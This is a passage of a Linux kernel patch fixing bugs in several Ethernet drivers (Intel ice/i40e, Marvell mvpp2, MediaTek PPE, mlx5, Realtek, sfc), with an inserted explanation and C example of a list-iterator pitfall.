+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+@@ -20,7 +20,7 @@ struct i40e_diag_reg_test_info {
+ 	u32 stride;	/* bytes between each element */
+ };
+ 
+-extern struct i40e_diag_reg_test_info i40e_reg_list[];
++extern const struct i40e_diag_reg_test_info i40e_reg_list[];
+ 
+ i40e_status i40e_diag_reg_test(struct i40e_hw *hw);
+ i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw);
+diff --git a/drivers/net/ethernet/intel/ice/ice_sched.c b/drivers/net/ethernet/intel/ice/ice_sched.c
+index 6d08b397df2ad..8f0ea411dfba0 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sched.c
++++ b/drivers/net/ethernet/intel/ice/ice_sched.c
+@@ -2787,7 +2787,7 @@ static int
+ ice_sched_assoc_vsi_to_agg(struct ice_port_info *pi, u32 agg_id,
+ 			   u16 vsi_handle, unsigned long *tc_bitmap)
+ {
+-	struct ice_sched_agg_vsi_info *agg_vsi_info, *old_agg_vsi_info = NULL;
++	struct ice_sched_agg_vsi_info *agg_vsi_info, *iter, *old_agg_vsi_info = NULL;
+ 	struct ice_sched_agg_info *agg_info, *old_agg_info;
+ 	struct ice_hw *hw = pi->hw;
+ 	int status = 0;
+@@ -2805,11 +2805,13 @@ ice_sched_assoc_vsi_to_agg(struct ice_port_info *pi, u32 agg_id,
+ 	if (old_agg_info && old_agg_info != agg_info) {
+ 		struct ice_sched_agg_vsi_info *vtmp;
+ 
+-		list_for_each_entry_safe(old_agg_vsi_info, vtmp,
++		list_for_each_entry_safe(iter, vtmp,
+ 					 &old_agg_info->agg_vsi_list,
+ 					 list_entry)
+-			if (old_agg_vsi_info->vsi_handle == vsi_handle)
++			if (iter->vsi_handle == vsi_handle) {
++				old_agg_vsi_info = iter;
+ 				break;
++			}
+ 	}
+ 
+ 	/* check if entry already exist */
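The iter/old_agg_vsi_info split above fixes a classic list_for_each_entry_safe() pitfall: if the loop runs to completion without a match, the cursor ends up pointing at the list head's container rather than a real entry, so using the result pointer as the loop cursor left it dangling on a miss. The safe shape is to walk with a scratch cursor and publish it only on a hit -- a minimal userspace analog:

	#include <stdio.h>

	struct node { int id; struct node *next; };

	int main(void)
	{
		struct node c = { 3, NULL }, b = { 2, &c }, a = { 1, &b };
		struct node *iter, *found = NULL;

		/* Walk with 'iter'; assign 'found' only on a match, so a
		 * full miss leaves it NULL instead of past-the-end.
		 */
		for (iter = &a; iter; iter = iter->next) {
			if (iter->id == 42) {
				found = iter;
				break;
			}
		}
		printf("found = %p\n", (void *)found);	/* null: no false match */
		return 0;
	}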
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 61f844d225123..46b36851af460 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -1780,18 +1780,36 @@ ice_update_vsi(struct ice_hw *hw, u16 vsi_handle, struct ice_vsi_ctx *vsi_ctx,
+ int
+ ice_cfg_rdma_fltr(struct ice_hw *hw, u16 vsi_handle, bool enable)
+ {
+-	struct ice_vsi_ctx *ctx;
++	struct ice_vsi_ctx *ctx, *cached_ctx;
++	int status;
++
++	cached_ctx = ice_get_vsi_ctx(hw, vsi_handle);
++	if (!cached_ctx)
++		return -ENOENT;
+ 
+-	ctx = ice_get_vsi_ctx(hw, vsi_handle);
++	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+-		return -EIO;
++		return -ENOMEM;
++
++	ctx->info.q_opt_rss = cached_ctx->info.q_opt_rss;
++	ctx->info.q_opt_tc = cached_ctx->info.q_opt_tc;
++	ctx->info.q_opt_flags = cached_ctx->info.q_opt_flags;
++
++	ctx->info.valid_sections = cpu_to_le16(ICE_AQ_VSI_PROP_Q_OPT_VALID);
+ 
+ 	if (enable)
+ 		ctx->info.q_opt_flags |= ICE_AQ_VSI_Q_OPT_PE_FLTR_EN;
+ 	else
+ 		ctx->info.q_opt_flags &= ~ICE_AQ_VSI_Q_OPT_PE_FLTR_EN;
+ 
+-	return ice_update_vsi(hw, vsi_handle, ctx, NULL);
++	status = ice_update_vsi(hw, vsi_handle, ctx, NULL);
++	if (!status) {
++		cached_ctx->info.q_opt_flags = ctx->info.q_opt_flags;
++		cached_ctx->info.valid_sections |= ctx->info.valid_sections;
++	}
++
++	kfree(ctx);
++	return status;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index c6a58343d81d8..a2645ff3100e4 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -541,6 +541,72 @@ static void ice_vc_fdir_rem_prof_all(struct ice_vf *vf)
+ 	}
+ }
+ 
++/**
++ * ice_vc_fdir_has_prof_conflict
++ * @vf: pointer to the VF structure
++ * @conf: FDIR configuration for each filter
++ *
++ * Check if @conf has conflicting profile with existing profiles
++ *
++ * Return: true if a conflicting profile is found, false otherwise.
++ */
++static bool
++ice_vc_fdir_has_prof_conflict(struct ice_vf *vf,
++			      struct virtchnl_fdir_fltr_conf *conf)
++{
++	struct ice_fdir_fltr *desc;
++
++	list_for_each_entry(desc, &vf->fdir.fdir_rule_list, fltr_node) {
++		struct virtchnl_fdir_fltr_conf *existing_conf;
++		enum ice_fltr_ptype flow_type_a, flow_type_b;
++		struct ice_fdir_fltr *a, *b;
++
++		existing_conf = to_fltr_conf_from_desc(desc);
++		a = &existing_conf->input;
++		b = &conf->input;
++		flow_type_a = a->flow_type;
++		flow_type_b = b->flow_type;
++
++		/* No need to compare two rules with different tunnel types or
++		 * with the same protocol type.
++		 */
++		if (existing_conf->ttype != conf->ttype ||
++		    flow_type_a == flow_type_b)
++			continue;
++
++		switch (flow_type_a) {
++		case ICE_FLTR_PTYPE_NONF_IPV4_UDP:
++		case ICE_FLTR_PTYPE_NONF_IPV4_TCP:
++		case ICE_FLTR_PTYPE_NONF_IPV4_SCTP:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_OTHER)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV4_OTHER:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_UDP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_TCP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_SCTP)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV6_UDP:
++		case ICE_FLTR_PTYPE_NONF_IPV6_TCP:
++		case ICE_FLTR_PTYPE_NONF_IPV6_SCTP:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_OTHER)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV6_OTHER:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_UDP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_TCP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_SCTP)
++				return true;
++			break;
++		default:
++			break;
++		}
++	}
++
++	return false;
++}
++
+ /**
+  * ice_vc_fdir_write_flow_prof
+  * @vf: pointer to the VF structure
+@@ -677,6 +743,13 @@ ice_vc_fdir_config_input_set(struct ice_vf *vf, struct virtchnl_fdir_add *fltr,
+ 	enum ice_fltr_ptype flow;
+ 	int ret;
+ 
++	ret = ice_vc_fdir_has_prof_conflict(vf, conf);
++	if (ret) {
++		dev_dbg(dev, "Found flow profile conflict for VF %d\n",
++			vf->vf_id);
++		return ret;
++	}
++
+ 	flow = input->flow_type;
+ 	ret = ice_vc_fdir_alloc_prof(vf, flow);
+ 	if (ret) {
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
+index 41d935d1aaf6f..40aeaa7bd739f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
+@@ -62,35 +62,38 @@ static const struct mvpp2_cls_flow cls_flows[MVPP2_N_PRS_FLOWS] = {
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4 |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OPT |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OTHER |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	/* TCP over IPv4 flows, fragmented, with vlan tag */
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	/* UDP over IPv4 flows, Not fragmented, no vlan tag */
+@@ -132,35 +135,38 @@ static const struct mvpp2_cls_flow cls_flows[MVPP2_N_PRS_FLOWS] = {
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4 |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OPT |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OTHER |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	/* UDP over IPv4 flows, fragmented, with vlan tag */
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	/* TCP over IPv6 flows, not fragmented, no vlan tag */
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
+index 75ba57bd1d46d..9af22f497a40f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
+@@ -1539,8 +1539,8 @@ static int mvpp2_prs_vlan_init(struct platform_device *pdev, struct mvpp2 *priv)
+ 	if (!priv->prs_double_vlans)
+ 		return -ENOMEM;
+ 
+-	/* Double VLAN: 0x8100, 0x88A8 */
+-	err = mvpp2_prs_double_vlan_add(priv, ETH_P_8021Q, ETH_P_8021AD,
++	/* Double VLAN: 0x88A8, 0x8100 */
++	err = mvpp2_prs_double_vlan_add(priv, ETH_P_8021AD, ETH_P_8021Q,
+ 					MVPP2_PRS_PORT_MASK);
+ 	if (err)
+ 		return err;
+@@ -1607,59 +1607,45 @@ static int mvpp2_prs_vlan_init(struct platform_device *pdev, struct mvpp2 *priv)
+ static int mvpp2_prs_pppoe_init(struct mvpp2 *priv)
+ {
+ 	struct mvpp2_prs_entry pe;
+-	int tid;
+-
+-	/* IPv4 over PPPoE with options */
+-	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+-					MVPP2_PE_LAST_FREE_TID);
+-	if (tid < 0)
+-		return tid;
+-
+-	memset(&pe, 0, sizeof(pe));
+-	mvpp2_prs_tcam_lu_set(&pe, MVPP2_PRS_LU_PPPOE);
+-	pe.index = tid;
+-
+-	mvpp2_prs_match_etype(&pe, 0, PPP_IP);
+-
+-	mvpp2_prs_sram_next_lu_set(&pe, MVPP2_PRS_LU_IP4);
+-	mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4_OPT,
+-				 MVPP2_PRS_RI_L3_PROTO_MASK);
+-	/* goto ipv4 dest-address (skip eth_type + IP-header-size - 4) */
+-	mvpp2_prs_sram_shift_set(&pe, MVPP2_ETH_TYPE_LEN +
+-				 sizeof(struct iphdr) - 4,
+-				 MVPP2_PRS_SRAM_OP_SEL_SHIFT_ADD);
+-	/* Set L3 offset */
+-	mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L3,
+-				  MVPP2_ETH_TYPE_LEN,
+-				  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
+-
+-	/* Update shadow table and hw entry */
+-	mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
+-	mvpp2_prs_hw_write(priv, &pe);
++	int tid, ihl;
+ 
+-	/* IPv4 over PPPoE without options */
+-	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+-					MVPP2_PE_LAST_FREE_TID);
+-	if (tid < 0)
+-		return tid;
++	/* IPv4 over PPPoE with header length >= 5 */
++	for (ihl = MVPP2_PRS_IPV4_IHL_MIN; ihl <= MVPP2_PRS_IPV4_IHL_MAX; ihl++) {
++		tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
++						MVPP2_PE_LAST_FREE_TID);
++		if (tid < 0)
++			return tid;
+ 
+-	pe.index = tid;
++		memset(&pe, 0, sizeof(pe));
++		mvpp2_prs_tcam_lu_set(&pe, MVPP2_PRS_LU_PPPOE);
++		pe.index = tid;
+ 
+-	mvpp2_prs_tcam_data_byte_set(&pe, MVPP2_ETH_TYPE_LEN,
+-				     MVPP2_PRS_IPV4_HEAD |
+-				     MVPP2_PRS_IPV4_IHL_MIN,
+-				     MVPP2_PRS_IPV4_HEAD_MASK |
+-				     MVPP2_PRS_IPV4_IHL_MASK);
++		mvpp2_prs_match_etype(&pe, 0, PPP_IP);
++		mvpp2_prs_tcam_data_byte_set(&pe, MVPP2_ETH_TYPE_LEN,
++					     MVPP2_PRS_IPV4_HEAD | ihl,
++					     MVPP2_PRS_IPV4_HEAD_MASK |
++					     MVPP2_PRS_IPV4_IHL_MASK);
+ 
+-	/* Clear ri before updating */
+-	pe.sram[MVPP2_PRS_SRAM_RI_WORD] = 0x0;
+-	pe.sram[MVPP2_PRS_SRAM_RI_CTRL_WORD] = 0x0;
+-	mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4,
+-				 MVPP2_PRS_RI_L3_PROTO_MASK);
++		mvpp2_prs_sram_next_lu_set(&pe, MVPP2_PRS_LU_IP4);
++		mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4,
++					 MVPP2_PRS_RI_L3_PROTO_MASK);
++		/* goto ipv4 dst-address (skip eth_type + IP-header-size - 4) */
++		mvpp2_prs_sram_shift_set(&pe, MVPP2_ETH_TYPE_LEN +
++					 sizeof(struct iphdr) - 4,
++					 MVPP2_PRS_SRAM_OP_SEL_SHIFT_ADD);
++		/* Set L3 offset */
++		mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L3,
++					  MVPP2_ETH_TYPE_LEN,
++					  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
++		/* Set L4 offset */
++		mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L4,
++					  MVPP2_ETH_TYPE_LEN + (ihl * 4),
++					  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
+ 
+-	/* Update shadow table and hw entry */
+-	mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
+-	mvpp2_prs_hw_write(priv, &pe);
++		/* Update shadow table and hw entry */
++		mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
++		mvpp2_prs_hw_write(priv, &pe);
++	}
+ 
+ 	/* IPv6 over PPPoE */
+ 	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 332329cb1ee00..bd7c18c839d42 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -713,8 +713,6 @@ static void mtk_mac_link_up(struct phylink_config *config,
+ 		break;
+ 	}
+ 
+-	mtk_set_queue_speed(mac->hw, mac->id, speed);
+-
+ 	/* Configure duplex */
+ 	if (duplex == DUPLEX_FULL)
+ 		mcr |= MAC_MCR_FORCE_DPX;
+@@ -2008,9 +2006,6 @@ static int mtk_poll_rx(struct napi_struct *napi, int budget,
+ 			skb_checksum_none_assert(skb);
+ 		skb->protocol = eth_type_trans(skb, netdev);
+ 
+-		if (reason == MTK_PPE_CPU_REASON_HIT_UNBIND_RATE_REACHED)
+-			mtk_ppe_check_skb(eth->ppe[0], skb, hash);
+-
+ 		if (netdev->features & NETIF_F_HW_VLAN_CTAG_RX) {
+ 			if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+ 				if (trxd.rxd3 & RX_DMA_VTAG_V2) {
+@@ -2038,6 +2033,9 @@ static int mtk_poll_rx(struct napi_struct *napi, int budget,
+ 			__vlan_hwaccel_put_tag(skb, htons(vlan_proto), vlan_tci);
+ 		}
+ 
++		if (reason == MTK_PPE_CPU_REASON_HIT_UNBIND_RATE_REACHED)
++			mtk_ppe_check_skb(eth->ppe[0], skb, hash);
++
+ 		skb_record_rx_queue(skb, 0);
+ 		napi_gro_receive(napi, skb);
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.c b/drivers/net/ethernet/mediatek/mtk_ppe.c
+index 1ff024f42444b..2ea539ccc0802 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.c
+@@ -8,6 +8,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/if_ether.h>
+ #include <linux/if_vlan.h>
++#include <net/dst_metadata.h>
+ #include <net/dsa.h>
+ #include "mtk_eth_soc.h"
+ #include "mtk_ppe.h"
+@@ -458,6 +459,7 @@ __mtk_foe_entry_clear(struct mtk_ppe *ppe, struct mtk_flow_entry *entry)
+ 		hwe->ib1 &= ~MTK_FOE_IB1_STATE;
+ 		hwe->ib1 |= FIELD_PREP(MTK_FOE_IB1_STATE, MTK_FOE_STATE_INVALID);
+ 		dma_wmb();
++		mtk_ppe_cache_clear(ppe);
+ 	}
+ 	entry->hash = 0xffff;
+ 
+@@ -699,7 +701,9 @@ void __mtk_ppe_check_skb(struct mtk_ppe *ppe, struct sk_buff *skb, u16 hash)
+ 		    skb->dev->dsa_ptr->tag_ops->proto != DSA_TAG_PROTO_MTK)
+ 			goto out;
+ 
+-		tag += 4;
++		if (!skb_metadata_dst(skb))
++			tag += 4;
++
+ 		if (get_unaligned_be16(tag) != ETH_P_8021Q)
+ 			break;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe_offload.c b/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
+index 81afd5ee3fbf1..161751bb36c9c 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
+@@ -576,6 +576,7 @@ mtk_eth_setup_tc_block(struct net_device *dev, struct flow_block_offload *f)
+ 		if (IS_ERR(block_cb))
+ 			return PTR_ERR(block_cb);
+ 
++		flow_block_cb_incref(block_cb);
+ 		flow_block_cb_add(block_cb, f);
+ 		list_add_tail(&block_cb->driver_list, &block_cb_list);
+ 		return 0;
+@@ -584,7 +585,7 @@ mtk_eth_setup_tc_block(struct net_device *dev, struct flow_block_offload *f)
+ 		if (!block_cb)
+ 			return -ENOENT;
+ 
+-		if (flow_block_cb_decref(block_cb)) {
++		if (!flow_block_cb_decref(block_cb)) {
+ 			flow_block_cb_remove(block_cb, f);
+ 			list_del(&block_cb->driver_list);
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 47d4b54d15634..1f4233b2842f7 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4117,13 +4117,17 @@ static bool mlx5e_xsk_validate_mtu(struct net_device *netdev,
+ 		struct xsk_buff_pool *xsk_pool =
+ 			mlx5e_xsk_get_pool(&chs->params, chs->params.xsk, ix);
+ 		struct mlx5e_xsk_param xsk;
++		int max_xdp_mtu;
+ 
+ 		if (!xsk_pool)
+ 			continue;
+ 
+ 		mlx5e_build_xsk_param(xsk_pool, &xsk);
++		max_xdp_mtu = mlx5e_xdp_max_mtu(new_params, &xsk);
+ 
+-		if (!mlx5e_validate_xsk_param(new_params, &xsk, mdev)) {
++		/* Validate XSK params and XDP MTU in advance */
++		if (!mlx5e_validate_xsk_param(new_params, &xsk, mdev) ||
++		    new_params->sw_mtu > max_xdp_mtu) {
+ 			u32 hr = mlx5e_get_linear_rq_headroom(new_params, &xsk);
+ 			int max_mtu_frame, max_mtu_page, max_mtu;
+ 
+@@ -4133,9 +4137,9 @@ static bool mlx5e_xsk_validate_mtu(struct net_device *netdev,
+ 			 */
+ 			max_mtu_frame = MLX5E_HW2SW_MTU(new_params, xsk.chunk_size - hr);
+ 			max_mtu_page = MLX5E_HW2SW_MTU(new_params, SKB_MAX_HEAD(0));
+-			max_mtu = min(max_mtu_frame, max_mtu_page);
++			max_mtu = min3(max_mtu_frame, max_mtu_page, max_xdp_mtu);
+ 
+-			netdev_err(netdev, "MTU %d is too big for an XSK running on channel %u. Try MTU <= %d\n",
++			netdev_err(netdev, "MTU %d is too big for an XSK running on channel %u or its redirection XDP program. Try MTU <= %d\n",
+ 				   new_params->sw_mtu, ix, max_mtu);
+ 			return false;
+ 		}
+diff --git a/drivers/net/ethernet/realtek/r8169_phy_config.c b/drivers/net/ethernet/realtek/r8169_phy_config.c
+index 930496cd34ed0..b50f16786c246 100644
+--- a/drivers/net/ethernet/realtek/r8169_phy_config.c
++++ b/drivers/net/ethernet/realtek/r8169_phy_config.c
+@@ -826,6 +826,9 @@ static void rtl8168h_2_hw_phy_config(struct rtl8169_private *tp,
+ 	/* disable phy pfm mode */
+ 	phy_modify_paged(phydev, 0x0a44, 0x11, BIT(7), 0);
+ 
++	/* disable 10m pll off */
++	phy_modify_paged(phydev, 0x0a43, 0x10, BIT(0), 0);
++
+ 	rtl8168g_disable_aldps(phydev);
+ 	rtl8168g_config_eee_phy(phydev);
+ }
+diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c
+index 7022fb2005a2f..d30459dbfe8f8 100644
+--- a/drivers/net/ethernet/sfc/ef10.c
++++ b/drivers/net/ethernet/sfc/ef10.c
+@@ -1304,7 +1304,8 @@ static void efx_ef10_fini_nic(struct efx_nic *efx)
+ static int efx_ef10_init_nic(struct efx_nic *efx)
+ {
+ 	struct efx_ef10_nic_data *nic_data = efx->nic_data;
+-	netdev_features_t hw_enc_features = 0;
++	struct net_device *net_dev = efx->net_dev;
++	netdev_features_t tun_feats, tso_feats;
+ 	int rc;
+ 
+ 	if (nic_data->must_check_datapath_caps) {
+@@ -1349,20 +1350,30 @@ static int efx_ef10_init_nic(struct efx_nic *efx)
+ 		nic_data->must_restore_piobufs = false;
+ 	}
+ 
+-	/* add encapsulated checksum offload features */
++	/* encap features might change during reset if fw variant changed */
+ 	if (efx_has_cap(efx, VXLAN_NVGRE) && !efx_ef10_is_vf(efx))
+-		hw_enc_features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
+-	/* add encapsulated TSO features */
+-	if (efx_has_cap(efx, TX_TSO_V2_ENCAP)) {
+-		netdev_features_t encap_tso_features;
++		net_dev->hw_enc_features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
++	else
++		net_dev->hw_enc_features &= ~(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM);
+ 
+-		encap_tso_features = NETIF_F_GSO_UDP_TUNNEL | NETIF_F_GSO_GRE |
+-			NETIF_F_GSO_UDP_TUNNEL_CSUM | NETIF_F_GSO_GRE_CSUM;
++	tun_feats = NETIF_F_GSO_UDP_TUNNEL | NETIF_F_GSO_GRE |
++		    NETIF_F_GSO_UDP_TUNNEL_CSUM | NETIF_F_GSO_GRE_CSUM;
++	tso_feats = NETIF_F_TSO | NETIF_F_TSO6;
+ 
+-		hw_enc_features |= encap_tso_features | NETIF_F_TSO;
+-		efx->net_dev->features |= encap_tso_features;
++	if (efx_has_cap(efx, TX_TSO_V2_ENCAP)) {
++		/* If this is the first nic_init, or if it is a reset and a new fw
++		 * variant has added new features, enable them by default.
++		 * If the features are not new, maintain their current value.
++		 */
